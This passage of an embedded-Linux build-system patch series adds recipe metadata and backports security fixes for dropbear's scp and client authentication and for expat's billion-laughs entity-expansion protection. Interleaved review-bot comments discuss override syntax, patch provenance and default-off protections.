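-PACKAGECONFIG[x11] = "--with-x --enable-x11-autolaunch,--without-x --disable-x11-autolaunch, virtual/libx11 libsm"
-PACKAGECONFIG[user-session] = "--enable-user-session --with-systemduserunitdir=${systemd_user_unitdir},--disable-user-session"
+EXTRA_OECONF += "--disable-tests"
 
 do_install() {
  autotools_do_install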
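diff --git a/meta/recipes-core/dropbear/dropbear.inc b/meta/recipes-core/dropbear/dropbear.inc
index 7269888a4e..0f5e9ba4ac 100644
--- a/meta/recipes-core/dropbear/dropbear.inc
+++ b/meta/recipes-core/dropbear/dropbear.inc
@@ -1,5 +1,6 @@
 SUMMARY = "A lightweight SSH and SCP implementation"
 HOMEPAGE = "http://matt.ucc.asn.au/dropbear/dropbear.html"
+DESCRIPTION = "Dropbear is a relatively small SSH server and client. It runs on a variety of POSIX-based platforms. Dropbear is open source software, distributed under a MIT-style license. Dropbear is particularly useful for "embedded"-type Linux (or other Unix) systems, such as wireless routers."
 SECTION = "console/network"
 
 # some files are from other projects and have others license terms:
@@ -11,6 +12,11 @@ DEPENDS = "zlib virtual/crypt"
 RPROVIDES_${PN} = "ssh sshd"
 RCONFLICTS_${PN} = "openssh-sshd openssh"
 
+# break dependency on base package for -dev package
+# otherwise SDK fails to build as the main openssh and dropbear packages
+# conflict with each other
+RDEPENDS:${PN}-dev = ""
+
 DEPENDS += "${@bb.utils.contains('DISTRO_FEATURES', 'pam', 'libpam', '', d)}"
 
 SRC_URI = "http://matt.ucc.asn.au/dropbear/releases/dropbear-${PV}.tar.bz2 \
@@ -21,7 +27,10 @@ SRC_URI = "http://matt.ucc.asn.au/dropbear/releases/dropbear-${PV}.tar.bz2 \
  file://dropbear.socket \
  file://dropbear.default \
  ${@bb.utils.contains('DISTRO_FEATURES', 'pam', '${PAM_SRC_URI}', '', d)} \
- ${@bb.utils.contains('PACKAGECONFIG', 'disable-weak-ciphers', 'file://dropbear-disable-weak-ciphers.patch', '', d)} "
+ ${@bb.utils.contains('PACKAGECONFIG', 'disable-weak-ciphers', 'file://dropbear-disable-weak-ciphers.patch', '', d)} \
+ file://CVE-2020-36254.patch \
+ file://CVE-2021-36369.patch \
+ "
 
 PAM_SRC_URI = "file://0005-dropbear-enable-pam.patch \
  file://0006-dropbear-configuration-file.patch \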
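Review bot: `RDEPENDS:${PN}-dev = ""` on new line 18 uses the colon override form, while every other override in this file and on this page uses the underscore form (`RPROVIDES_${PN}` and `RCONFLICTS_${PN}` just above it, `RDEPENDS_${PN}-dev` in the dbus-test recipe). If the BitBake on this branch does not treat `:` as an override separator, the assignment sets an unrelated variable and the -dev package keeps its default dependency on the base package, so the SDK conflict the new comment describes would remain. Written in the file's own convention the line is `RDEPENDS_${PN}-dev = ""`.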
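diff --git a/meta/recipes-core/dropbear/dropbear/CVE-2020-36254.patch b/meta/recipes-core/dropbear/dropbear/CVE-2020-36254.patch
new file mode 100644
index 0000000000..64d0d96486
--- /dev/null
+++ b/meta/recipes-core/dropbear/dropbear/CVE-2020-36254.patch
@@ -0,0 +1,29 @@
+From c96c48d62aefc372f2105293ddf8cff2d116dc3a Mon Sep 17 00:00:00 2001
+From: Haelwenn Monnier <contact+github.com@hacktivis.me>
+Date: Mon, 25 May 2020 14:54:29 +0200
+Subject: [PATCH] scp.c: Port OpenSSH CVE-2018-20685 fix (#80)
+
+Reference:
+https://github.com/mkj/dropbear/commit/8f8a3dff705fad774a10864a2e3dbcfa9779ceff
+
+CVE: CVE-2020-36254
+Upstream-Status: Backport
+
+---
+ scp.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/scp.c b/scp.c
+index 742ae00..7b8e7d2 100644
+--- a/scp.c
++++ b/scp.c
+@@ -935,7 +935,8 @@ sink(int argc, char **argv)
+ size = size * 10 + (*cp++ - '0');
+ if (*cp++ != ' ')
+ SCREWUP("size not delimited");
+- if ((strchr(cp, '/') != NULL) || (strcmp(cp, "..") == 0)) {
++ if (*cp == '\0' || strchr(cp, '/') != NULL ||
++ strcmp(cp, ".") == 0 || strcmp(cp, "..") == 0) {
+ run_err("error: unexpected filename: %s", cp);
+ exit(1);
+ }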
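Review bot: `Upstream-Status: Backport` on line 10 of the new file names no commit, and the header has no `Signed-off-by:` for the person who did the backport, so the origin of the change rests on the free-text Reference line alone. The `From` hash on line 1 also differs from the hash in that Reference URL, which makes it unclear which upstream commit was taken. I would fold the reference into the tag, `Upstream-Status: Backport [https://github.com/mkj/dropbear/commit/8f8a3dff705fad774a10864a2e3dbcfa9779ceff]`, and add the sign-off. The patched `sink()` function continues outside the inner hunk.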
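diff --git a/meta/recipes-core/dropbear/dropbear/CVE-2021-36369.patch b/meta/recipes-core/dropbear/dropbear/CVE-2021-36369.patch
new file mode 100644
index 0000000000..5cabe8339d
--- /dev/null
+++ b/meta/recipes-core/dropbear/dropbear/CVE-2021-36369.patch
@@ -0,0 +1,145 @@
+From e10dec82930863e487b22978d3df107274f366b2 Mon Sep 17 00:00:00 2001
+From: Manfred Kaiser <37737811+manfred-kaiser@users.noreply.github.com>
+Date: Thu, 19 Aug 2021 17:37:14 +0200
+Subject: [PATCH] added option to disable trivial auth methods (#128)
+
+* added option to disable trivial auth methods
+
+* rename argument to match with other ssh clients
+
+* fixed trivial auth detection for pubkeys
+
+[https://github.com/mkj/dropbear/pull/128]
+Upstream-Status: Backport
+CVE: CVE-2021-36369
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ cli-auth.c | 3 +++
+ cli-authinteract.c | 1 +
+ cli-authpasswd.c | 2 +-
+ cli-authpubkey.c | 1 +
+ cli-runopts.c | 7 +++++++
+ cli-session.c | 1 +
+ runopts.h | 1 +
+ session.h | 1 +
+ 8 files changed, 16 insertions(+), 1 deletion(-)
+
+diff --git a/cli-auth.c b/cli-auth.c
+index 2e509e5..6f04495 100644
+--- a/cli-auth.c
++++ b/cli-auth.c
+@@ -267,6 +267,9 @@ void recv_msg_userauth_success() {
+ if DROPBEAR_CLI_IMMEDIATE_AUTH is set */
+
+ TRACE(("received msg_userauth_success"))
++ if (cli_opts.disable_trivial_auth && cli_ses.is_trivial_auth) {
++ dropbear_exit("trivial authentication not allowed");
++ }
+ /* Note: in delayed-zlib mode, setting authdone here
+ * will enable compression in the transport layer */
+ ses.authstate.authdone = 1;
+diff --git a/cli-authinteract.c b/cli-authinteract.c
+index e1cc9a1..f7128ee 100644
+--- a/cli-authinteract.c
++++ b/cli-authinteract.c
+@@ -114,6 +114,7 @@ void recv_msg_userauth_info_request() {
+ m_free(instruction);
+
+ for (i = 0; i < num_prompts; i++) {
++ cli_ses.is_trivial_auth = 0;
+ unsigned int response_len = 0;
+ prompt = buf_getstring(ses.payload, NULL);
+ cleantext(prompt);
+diff --git a/cli-authpasswd.c b/cli-authpasswd.c
+index 00fdd8b..a24d43e 100644
+--- a/cli-authpasswd.c
++++ b/cli-authpasswd.c
+@@ -155,7 +155,7 @@ void cli_auth_password() {
+
+ encrypt_packet();
+ m_burn(password, strlen(password));
+-
++ cli_ses.is_trivial_auth = 0;
+ TRACE(("leave cli_auth_password"))
+ }
+ #endif /* DROPBEAR_CLI_PASSWORD_AUTH */
+diff --git a/cli-authpubkey.c b/cli-authpubkey.c
+index 7cee164..7da1a04 100644
+--- a/cli-authpubkey.c
++++ b/cli-authpubkey.c
+@@ -174,6 +174,7 @@ static void send_msg_userauth_pubkey(sign_key *key, int type, int realsign) {
+ buf_putbytes(sigbuf, ses.writepayload->data, ses.writepayload->len);
+ cli_buf_put_sign(ses.writepayload, key, type, sigbuf);
+ buf_free(sigbuf); /* Nothing confidential in the buffer */
++ cli_ses.is_trivial_auth = 0;
+ }
+
+ encrypt_packet();
+diff --git a/cli-runopts.c b/cli-runopts.c
+index 7d1fffe..6bf8b8e 100644
+--- a/cli-runopts.c
++++ b/cli-runopts.c
+@@ -152,6 +152,7 @@ void cli_getopts(int argc, char ** argv) {
+ #if DROPBEAR_CLI_ANYTCPFWD
+ cli_opts.exit_on_fwd_failure = 0;
+ #endif
++ cli_opts.disable_trivial_auth = 0;
+ #if DROPBEAR_CLI_LOCALTCPFWD
+ cli_opts.localfwds = list_new();
+ opts.listen_fwd_all = 0;
+@@ -888,6 +889,7 @@ static void add_extendedopt(const char* origstr) {
+ #if DROPBEAR_CLI_ANYTCPFWD
+ "\tExitOnForwardFailure\n"
+ #endif
++ "\tDisableTrivialAuth\n"
+ #ifndef DISABLE_SYSLOG
+ "\tUseSyslog\n"
+ #endif
+@@ -915,5 +917,10 @@ static void add_extendedopt(const char* origstr) {
+ return;
+ }
+
++ if (match_extendedopt(&optstr, "DisableTrivialAuth") == DROPBEAR_SUCCESS) {
++ cli_opts.disable_trivial_auth = parse_flag_value(optstr);
++ return;
++ }
++
+ dropbear_log(LOG_WARNING, "Ignoring unknown configuration option '%s'", origstr);
+ }
+diff --git a/cli-session.c b/cli-session.c
+index 56dd4af..73ef0db 100644
+--- a/cli-session.c
++++ b/cli-session.c
+@@ -164,6 +164,7 @@ static void cli_session_init(pid_t proxy_cmd_pid) {
+ /* Auth */
+ cli_ses.lastprivkey = NULL;
+ cli_ses.lastauthtype = 0;
++ cli_ses.is_trivial_auth = 1;
+
+ /* For printing "remote host closed" for the user */
+ ses.remoteclosed = cli_remoteclosed;
+diff --git a/runopts.h b/runopts.h
+index 31eae1f..8519626 100644
+--- a/runopts.h
++++ b/runopts.h
+@@ -154,6 +154,7 @@ typedef struct cli_runopts {
+ #if DROPBEAR_CLI_ANYTCPFWD
+ int exit_on_fwd_failure;
+ #endif
++ int disable_trivial_auth;
+ #if DROPBEAR_CLI_REMOTETCPFWD
+ m_list * remotefwds;
+ #endif
+diff --git a/session.h b/session.h
+index 0f77055..8676054 100644
+--- a/session.h
++++ b/session.h
+@@ -287,6 +287,7 @@ struct clientsession {
+
+ int lastauthtype; /* either AUTH_TYPE_PUBKEY or AUTH_TYPE_PASSWORD,
+ for the last type of auth we tried */
++ int is_trivial_auth;
+ int ignore_next_auth_response;
+ #if DROPBEAR_CLI_INTERACT_AUTH
+ int auth_interact_failed; /* flag whether interactive auth can still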
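Review bot: The backport leaves the new protection switched off by default: `cli_getopts` initialises `cli_opts.disable_trivial_auth = 0` in the cli-runopts.c hunk, so the check added to `recv_msg_userauth_success` only rejects a trivial authentication when the client is started with the `DisableTrivialAuth` extended option. The recipe still lists this file as the fix for CVE-2021-36369, so a scan keyed on the patch name or its `CVE:` tag will presumably report the issue as patched while the default client behaviour is unchanged. I would record that next to the SRC_URI entry in dropbear.inc, for example `# CVE-2021-36369.patch only adds the opt-in client option DisableTrivialAuth (default off)`, so integrators know the option has to be enabled where the client is used. Every function touched here starts and ends outside its inner hunk.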
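diff --git a/meta/recipes-core/ell/ell_0.33.bb b/meta/recipes-core/ell/ell_0.33.bb
index 2fa05104fb..bef1e9a0b5 100644
--- a/meta/recipes-core/ell/ell_0.33.bb
+++ b/meta/recipes-core/ell/ell_0.33.bb
@@ -1,4 +1,5 @@
 SUMMARY = "Embedded Linux Library"
+HOMEPAGE = "https://01.org/ell"
 DESCRIPTION = "The Embedded Linux Library (ELL) provides core, \
 low-level functionality for system daemons. It typically has no \
 dependencies other than the Linux kernel, C standard library, and \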
diff --git a/meta/recipes-core/expat/expat/CVE-2013-0340.patch b/meta/recipes-core/expat/expat/CVE-2013-0340.patch
new file mode 100644
index 0000000000..1ab4d06508
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2013-0340.patch
@@ -0,0 +1,1758 @@
1From a644ccf25392523b1329872310e24d0fc5f40629 Mon Sep 17 00:00:00 2001
2From: Sebastian Pipping <sebastian@pipping.org>
3Date: Mon, 19 Apr 2021 21:42:51 +0200
4Subject: [PATCH] expat: Backport fix for CVE-2013-0340
5
6Issue: https://github.com/libexpat/libexpat/issues/34
7
8This patch cherry-picks the following commits from upstream release
92.4.0 onto 2.2.9:
10
11- b1d039607d3d8a042bf0466bfcc1c0f104e353c8
12- 60959f2b491876199879d97c8ed956eabb0c2e73
13
14Upstream-Status: Backport
15CVE: CVE-2013-0340
16Signed-off-by: Jasper Orschulko <jasper@fancydomain.eu>
17---
18 lib/expat.h | 21 +-
19 lib/internal.h | 30 +
20 lib/libexpat.def | 3 +
21 lib/libexpatw.def | 3 +
22 lib/xmlparse.c | 1147 +++++++++++++++++++++++++++++++++++++--
23 5 files changed, 1143 insertions(+), 61 deletions(-)
24
25diff --git a/lib/expat.h b/lib/expat.h
26index 48a6e2a3..0fb70d9d 100644
27--- a/lib/expat.h
28+++ b/lib/expat.h
29@@ -115,7 +115,9 @@ enum XML_Error {
30 XML_ERROR_RESERVED_PREFIX_XMLNS,
31 XML_ERROR_RESERVED_NAMESPACE_URI,
32 /* Added in 2.2.1. */
33- XML_ERROR_INVALID_ARGUMENT
34+ XML_ERROR_INVALID_ARGUMENT,
35+ /* Added in 2.4.0. */
36+ XML_ERROR_AMPLIFICATION_LIMIT_BREACH
37 };
38
39 enum XML_Content_Type {
40@@ -997,7 +999,10 @@ enum XML_FeatureEnum {
41 XML_FEATURE_SIZEOF_XML_LCHAR,
42 XML_FEATURE_NS,
43 XML_FEATURE_LARGE_SIZE,
44- XML_FEATURE_ATTR_INFO
45+ XML_FEATURE_ATTR_INFO,
46+ /* Added in Expat 2.4.0. */
47+ XML_FEATURE_BILLION_LAUGHS_ATTACK_PROTECTION_MAXIMUM_AMPLIFICATION_DEFAULT,
48+ XML_FEATURE_BILLION_LAUGHS_ATTACK_PROTECTION_ACTIVATION_THRESHOLD_DEFAULT
49 /* Additional features must be added to the end of this enum. */
50 };
51
52@@ -1010,6 +1015,18 @@ typedef struct {
53 XMLPARSEAPI(const XML_Feature *)
54 XML_GetFeatureList(void);
55
56+#ifdef XML_DTD
57+/* Added in Expat 2.4.0. */
58+XMLPARSEAPI(XML_Bool)
59+XML_SetBillionLaughsAttackProtectionMaximumAmplification(
60+ XML_Parser parser, float maximumAmplificationFactor);
61+
62+/* Added in Expat 2.4.0. */
63+XMLPARSEAPI(XML_Bool)
64+XML_SetBillionLaughsAttackProtectionActivationThreshold(
65+ XML_Parser parser, unsigned long long activationThresholdBytes);
66+#endif
67+
68 /* Expat follows the semantic versioning convention.
69 See http://semver.org.
70 */
71diff --git a/lib/internal.h b/lib/internal.h
72index 60913dab..d8b31fa2 100644
73--- a/lib/internal.h
74+++ b/lib/internal.h
75@@ -101,10 +101,40 @@
76 # endif
77 #endif
78
79+#include <limits.h> // ULONG_MAX
80+
81+#if defined(_WIN32) && ! defined(__USE_MINGW_ANSI_STDIO)
82+# define EXPAT_FMT_ULL(midpart) "%" midpart "I64u"
83+# if defined(_WIN64) // Note: modifier "td" does not work for MinGW
84+# define EXPAT_FMT_PTRDIFF_T(midpart) "%" midpart "I64d"
85+# else
86+# define EXPAT_FMT_PTRDIFF_T(midpart) "%" midpart "d"
87+# endif
88+#else
89+# define EXPAT_FMT_ULL(midpart) "%" midpart "llu"
90+# if ! defined(ULONG_MAX)
91+# error Compiler did not define ULONG_MAX for us
92+# elif ULONG_MAX == 18446744073709551615u // 2^64-1
93+# define EXPAT_FMT_PTRDIFF_T(midpart) "%" midpart "ld"
94+# else
95+# define EXPAT_FMT_PTRDIFF_T(midpart) "%" midpart "d"
96+# endif
97+#endif
98+
99 #ifndef UNUSED_P
100 # define UNUSED_P(p) (void)p
101 #endif
102
103+/* NOTE BEGIN If you ever patch these defaults to greater values
104+ for non-attack XML payload in your environment,
105+ please file a bug report with libexpat. Thank you!
106+*/
107+#define EXPAT_BILLION_LAUGHS_ATTACK_PROTECTION_MAXIMUM_AMPLIFICATION_DEFAULT \
108+ 100.0f
109+#define EXPAT_BILLION_LAUGHS_ATTACK_PROTECTION_ACTIVATION_THRESHOLD_DEFAULT \
110+ 8388608 // 8 MiB, 2^23
111+/* NOTE END */
112+
113 #ifdef __cplusplus
114 extern "C" {
115 #endif
116diff --git a/lib/libexpat.def b/lib/libexpat.def
117index 16faf595..5aefa6df 100644
118--- a/lib/libexpat.def
119+++ b/lib/libexpat.def
120@@ -76,3 +76,6 @@ EXPORTS
121 XML_SetHashSalt @67
122 ; added with version 2.2.5
123 _INTERNAL_trim_to_complete_utf8_characters @68
124+; added with version 2.4.0
125+ XML_SetBillionLaughsAttackProtectionActivationThreshold @69
126+ XML_SetBillionLaughsAttackProtectionMaximumAmplification @70
127diff --git a/lib/libexpatw.def b/lib/libexpatw.def
128index 16faf595..5aefa6df 100644
129--- a/lib/libexpatw.def
130+++ b/lib/libexpatw.def
131@@ -76,3 +76,6 @@ EXPORTS
132 XML_SetHashSalt @67
133 ; added with version 2.2.5
134 _INTERNAL_trim_to_complete_utf8_characters @68
135+; added with version 2.4.0
136+ XML_SetBillionLaughsAttackProtectionActivationThreshold @69
137+ XML_SetBillionLaughsAttackProtectionMaximumAmplification @70
138diff --git a/lib/xmlparse.c b/lib/xmlparse.c
139index 3aaf35b9..6790bc28 100644
140--- a/lib/xmlparse.c
141+++ b/lib/xmlparse.c
142@@ -47,6 +47,8 @@
143 #include <limits.h> /* UINT_MAX */
144 #include <stdio.h> /* fprintf */
145 #include <stdlib.h> /* getenv, rand_s */
146+#include <stdint.h> /* uintptr_t */
147+#include <math.h> /* isnan */
148
149 #ifdef _WIN32
150 # define getpid GetCurrentProcessId
151@@ -373,6 +375,31 @@ typedef struct open_internal_entity {
152 XML_Bool betweenDecl; /* WFC: PE Between Declarations */
153 } OPEN_INTERNAL_ENTITY;
154
155+enum XML_Account {
156+ XML_ACCOUNT_DIRECT, /* bytes directly passed to the Expat parser */
157+ XML_ACCOUNT_ENTITY_EXPANSION, /* intermediate bytes produced during entity
158+ expansion */
159+ XML_ACCOUNT_NONE /* i.e. do not account, was accounted already */
160+};
161+
162+#ifdef XML_DTD
163+typedef unsigned long long XmlBigCount;
164+typedef struct accounting {
165+ XmlBigCount countBytesDirect;
166+ XmlBigCount countBytesIndirect;
167+ int debugLevel;
168+ float maximumAmplificationFactor; // >=1.0
169+ unsigned long long activationThresholdBytes;
170+} ACCOUNTING;
171+
172+typedef struct entity_stats {
173+ unsigned int countEverOpened;
174+ unsigned int currentDepth;
175+ unsigned int maximumDepthSeen;
176+ int debugLevel;
177+} ENTITY_STATS;
178+#endif /* XML_DTD */
179+
180 typedef enum XML_Error PTRCALL Processor(XML_Parser parser, const char *start,
181 const char *end, const char **endPtr);
182
183@@ -403,16 +430,18 @@ static enum XML_Error initializeEncoding(XML_Parser parser);
184 static enum XML_Error doProlog(XML_Parser parser, const ENCODING *enc,
185 const char *s, const char *end, int tok,
186 const char *next, const char **nextPtr,
187- XML_Bool haveMore, XML_Bool allowClosingDoctype);
188+ XML_Bool haveMore, XML_Bool allowClosingDoctype,
189+ enum XML_Account account);
190 static enum XML_Error processInternalEntity(XML_Parser parser, ENTITY *entity,
191 XML_Bool betweenDecl);
192 static enum XML_Error doContent(XML_Parser parser, int startTagLevel,
193 const ENCODING *enc, const char *start,
194 const char *end, const char **endPtr,
195- XML_Bool haveMore);
196+ XML_Bool haveMore, enum XML_Account account);
197 static enum XML_Error doCdataSection(XML_Parser parser, const ENCODING *,
198 const char **startPtr, const char *end,
199- const char **nextPtr, XML_Bool haveMore);
200+ const char **nextPtr, XML_Bool haveMore,
201+ enum XML_Account account);
202 #ifdef XML_DTD
203 static enum XML_Error doIgnoreSection(XML_Parser parser, const ENCODING *,
204 const char **startPtr, const char *end,
205@@ -422,7 +451,8 @@ static enum XML_Error doIgnoreSection(XML_Parser parser, const ENCODING *,
206 static void freeBindings(XML_Parser parser, BINDING *bindings);
207 static enum XML_Error storeAtts(XML_Parser parser, const ENCODING *,
208 const char *s, TAG_NAME *tagNamePtr,
209- BINDING **bindingsPtr);
210+ BINDING **bindingsPtr,
211+ enum XML_Account account);
212 static enum XML_Error addBinding(XML_Parser parser, PREFIX *prefix,
213 const ATTRIBUTE_ID *attId, const XML_Char *uri,
214 BINDING **bindingsPtr);
215@@ -431,15 +461,18 @@ static int defineAttribute(ELEMENT_TYPE *type, ATTRIBUTE_ID *, XML_Bool isCdata,
216 XML_Parser parser);
217 static enum XML_Error storeAttributeValue(XML_Parser parser, const ENCODING *,
218 XML_Bool isCdata, const char *,
219- const char *, STRING_POOL *);
220+ const char *, STRING_POOL *,
221+ enum XML_Account account);
222 static enum XML_Error appendAttributeValue(XML_Parser parser, const ENCODING *,
223 XML_Bool isCdata, const char *,
224- const char *, STRING_POOL *);
225+ const char *, STRING_POOL *,
226+ enum XML_Account account);
227 static ATTRIBUTE_ID *getAttributeId(XML_Parser parser, const ENCODING *enc,
228 const char *start, const char *end);
229 static int setElementTypePrefix(XML_Parser parser, ELEMENT_TYPE *);
230 static enum XML_Error storeEntityValue(XML_Parser parser, const ENCODING *enc,
231- const char *start, const char *end);
232+ const char *start, const char *end,
233+ enum XML_Account account);
234 static int reportProcessingInstruction(XML_Parser parser, const ENCODING *enc,
235 const char *start, const char *end);
236 static int reportComment(XML_Parser parser, const ENCODING *enc,
237@@ -503,6 +536,35 @@ static XML_Parser parserCreate(const XML_Char *encodingName,
238
239 static void parserInit(XML_Parser parser, const XML_Char *encodingName);
240
241+#ifdef XML_DTD
242+static float accountingGetCurrentAmplification(XML_Parser rootParser);
243+static void accountingReportStats(XML_Parser originParser, const char *epilog);
244+static void accountingOnAbort(XML_Parser originParser);
245+static void accountingReportDiff(XML_Parser rootParser,
246+ unsigned int levelsAwayFromRootParser,
247+ const char *before, const char *after,
248+ ptrdiff_t bytesMore, int source_line,
249+ enum XML_Account account);
250+static XML_Bool accountingDiffTolerated(XML_Parser originParser, int tok,
251+ const char *before, const char *after,
252+ int source_line,
253+ enum XML_Account account);
254+
255+static void entityTrackingReportStats(XML_Parser parser, ENTITY *entity,
256+ const char *action, int sourceLine);
257+static void entityTrackingOnOpen(XML_Parser parser, ENTITY *entity,
258+ int sourceLine);
259+static void entityTrackingOnClose(XML_Parser parser, ENTITY *entity,
260+ int sourceLine);
261+
262+static XML_Parser getRootParserOf(XML_Parser parser,
263+ unsigned int *outLevelDiff);
264+static const char *unsignedCharToPrintable(unsigned char c);
265+#endif /* XML_DTD */
266+
267+static unsigned long getDebugLevel(const char *variableName,
268+ unsigned long defaultDebugLevel);
269+
270 #define poolStart(pool) ((pool)->start)
271 #define poolEnd(pool) ((pool)->ptr)
272 #define poolLength(pool) ((pool)->ptr - (pool)->start)
273@@ -616,6 +678,10 @@ struct XML_ParserStruct {
274 enum XML_ParamEntityParsing m_paramEntityParsing;
275 #endif
276 unsigned long m_hash_secret_salt;
277+#ifdef XML_DTD
278+ ACCOUNTING m_accounting;
279+ ENTITY_STATS m_entity_stats;
280+#endif
281 };
282
283 #define MALLOC(parser, s) (parser->m_mem.malloc_fcn((s)))
284@@ -1055,6 +1121,18 @@ parserInit(XML_Parser parser, const XML_Char *encodingName) {
285 parser->m_paramEntityParsing = XML_PARAM_ENTITY_PARSING_NEVER;
286 #endif
287 parser->m_hash_secret_salt = 0;
288+
289+#ifdef XML_DTD
290+ memset(&parser->m_accounting, 0, sizeof(ACCOUNTING));
291+ parser->m_accounting.debugLevel = getDebugLevel("EXPAT_ACCOUNTING_DEBUG", 0u);
292+ parser->m_accounting.maximumAmplificationFactor
293+ = EXPAT_BILLION_LAUGHS_ATTACK_PROTECTION_MAXIMUM_AMPLIFICATION_DEFAULT;
294+ parser->m_accounting.activationThresholdBytes
295+ = EXPAT_BILLION_LAUGHS_ATTACK_PROTECTION_ACTIVATION_THRESHOLD_DEFAULT;
296+
297+ memset(&parser->m_entity_stats, 0, sizeof(ENTITY_STATS));
298+ parser->m_entity_stats.debugLevel = getDebugLevel("EXPAT_ENTITY_DEBUG", 0u);
299+#endif
300 }
301
302 /* moves list of bindings to m_freeBindingList */
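Review bot: `getDebugLevel` is declared as returning `unsigned long`, but both results here are stored into the `int debugLevel` fields declared earlier in this patch, so a large value converts in an implementation-defined way. Declaring the fields as `unsigned long`, or clamping before the assignment, would remove the ambiguity. Separately, this block always restores the default amplification limit and activation threshold. If parserInit is also reached when an existing parser is reset (its callers are outside this hunk), limits set through the new setters would be silently replaced by the defaults, which deserves a comment such as `/* note: resets caller-configured limits to the defaults */`.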
303@@ -2318,6 +2396,10 @@ XML_ErrorString(enum XML_Error code) {
304 /* Added in 2.2.5. */
305 case XML_ERROR_INVALID_ARGUMENT: /* Constant added in 2.2.1, already */
306 return XML_L("invalid argument");
307+ /* Added in 2.4.0. */
308+ case XML_ERROR_AMPLIFICATION_LIMIT_BREACH:
309+ return XML_L(
310+ "limit on input amplification factor (from DTD and entities) breached");
311 }
312 return NULL;
313 }
314@@ -2354,41 +2436,75 @@ XML_ExpatVersionInfo(void) {
315
316 const XML_Feature *XMLCALL
317 XML_GetFeatureList(void) {
318- static const XML_Feature features[]
319- = {{XML_FEATURE_SIZEOF_XML_CHAR, XML_L("sizeof(XML_Char)"),
320- sizeof(XML_Char)},
321- {XML_FEATURE_SIZEOF_XML_LCHAR, XML_L("sizeof(XML_LChar)"),
322- sizeof(XML_LChar)},
323+ static const XML_Feature features[] = {
324+ {XML_FEATURE_SIZEOF_XML_CHAR, XML_L("sizeof(XML_Char)"),
325+ sizeof(XML_Char)},
326+ {XML_FEATURE_SIZEOF_XML_LCHAR, XML_L("sizeof(XML_LChar)"),
327+ sizeof(XML_LChar)},
328 #ifdef XML_UNICODE
329- {XML_FEATURE_UNICODE, XML_L("XML_UNICODE"), 0},
330+ {XML_FEATURE_UNICODE, XML_L("XML_UNICODE"), 0},
331 #endif
332 #ifdef XML_UNICODE_WCHAR_T
333- {XML_FEATURE_UNICODE_WCHAR_T, XML_L("XML_UNICODE_WCHAR_T"), 0},
334+ {XML_FEATURE_UNICODE_WCHAR_T, XML_L("XML_UNICODE_WCHAR_T"), 0},
335 #endif
336 #ifdef XML_DTD
337- {XML_FEATURE_DTD, XML_L("XML_DTD"), 0},
338+ {XML_FEATURE_DTD, XML_L("XML_DTD"), 0},
339 #endif
340 #ifdef XML_CONTEXT_BYTES
341- {XML_FEATURE_CONTEXT_BYTES, XML_L("XML_CONTEXT_BYTES"),
342- XML_CONTEXT_BYTES},
343+ {XML_FEATURE_CONTEXT_BYTES, XML_L("XML_CONTEXT_BYTES"),
344+ XML_CONTEXT_BYTES},
345 #endif
346 #ifdef XML_MIN_SIZE
347- {XML_FEATURE_MIN_SIZE, XML_L("XML_MIN_SIZE"), 0},
348+ {XML_FEATURE_MIN_SIZE, XML_L("XML_MIN_SIZE"), 0},
349 #endif
350 #ifdef XML_NS
351- {XML_FEATURE_NS, XML_L("XML_NS"), 0},
352+ {XML_FEATURE_NS, XML_L("XML_NS"), 0},
353 #endif
354 #ifdef XML_LARGE_SIZE
355- {XML_FEATURE_LARGE_SIZE, XML_L("XML_LARGE_SIZE"), 0},
356+ {XML_FEATURE_LARGE_SIZE, XML_L("XML_LARGE_SIZE"), 0},
357 #endif
358 #ifdef XML_ATTR_INFO
359- {XML_FEATURE_ATTR_INFO, XML_L("XML_ATTR_INFO"), 0},
360+ {XML_FEATURE_ATTR_INFO, XML_L("XML_ATTR_INFO"), 0},
361 #endif
362- {XML_FEATURE_END, NULL, 0}};
363+#ifdef XML_DTD
364+ /* Added in Expat 2.4.0. */
365+ {XML_FEATURE_BILLION_LAUGHS_ATTACK_PROTECTION_MAXIMUM_AMPLIFICATION_DEFAULT,
366+ XML_L("XML_BLAP_MAX_AMP"),
367+ (long int)
368+ EXPAT_BILLION_LAUGHS_ATTACK_PROTECTION_MAXIMUM_AMPLIFICATION_DEFAULT},
369+ {XML_FEATURE_BILLION_LAUGHS_ATTACK_PROTECTION_ACTIVATION_THRESHOLD_DEFAULT,
370+ XML_L("XML_BLAP_ACT_THRES"),
371+ EXPAT_BILLION_LAUGHS_ATTACK_PROTECTION_ACTIVATION_THRESHOLD_DEFAULT},
372+#endif
373+ {XML_FEATURE_END, NULL, 0}};
374
375 return features;
376 }
377
378+#ifdef XML_DTD
379+XML_Bool XMLCALL
380+XML_SetBillionLaughsAttackProtectionMaximumAmplification(
381+ XML_Parser parser, float maximumAmplificationFactor) {
382+ if ((parser == NULL) || (parser->m_parentParser != NULL)
383+ || isnan(maximumAmplificationFactor)
384+ || (maximumAmplificationFactor < 1.0f)) {
385+ return XML_FALSE;
386+ }
387+ parser->m_accounting.maximumAmplificationFactor = maximumAmplificationFactor;
388+ return XML_TRUE;
389+}
390+
391+XML_Bool XMLCALL
392+XML_SetBillionLaughsAttackProtectionActivationThreshold(
393+ XML_Parser parser, unsigned long long activationThresholdBytes) {
394+ if ((parser == NULL) || (parser->m_parentParser != NULL)) {
395+ return XML_FALSE;
396+ }
397+ parser->m_accounting.activationThresholdBytes = activationThresholdBytes;
398+ return XML_TRUE;
399+}
400+#endif /* XML_DTD */
401+
402 /* Initially tag->rawName always points into the parse buffer;
403 for those TAG instances opened while the current parse buffer was
404 processed, and not yet closed, we need to store tag->rawName in a more
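Review bot: The range check in XML_SetBillionLaughsAttackProtectionMaximumAmplification rejects NaN and values below 1.0f but lets positive infinity through, and XML_SetBillionLaughsAttackProtectionActivationThreshold accepts any value up to the maximum of `unsigned long long`. Either call can therefore presumably switch the protection off in practice. If that is the intended opt-out, say so in a comment above each setter, e.g. `/* +inf disables the amplification limit; root parser only */`; if not, add `|| isinf(maximumAmplificationFactor)` to the condition. Neither setter has a doc comment explaining why a parser with `m_parentParser != NULL` is refused. In XML_GetFeatureList the `(long int)` cast would truncate a fractional default, which is worth a short comment as well.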
405@@ -2441,9 +2557,9 @@ storeRawNames(XML_Parser parser) {
406 static enum XML_Error PTRCALL
407 contentProcessor(XML_Parser parser, const char *start, const char *end,
408 const char **endPtr) {
409- enum XML_Error result
410- = doContent(parser, 0, parser->m_encoding, start, end, endPtr,
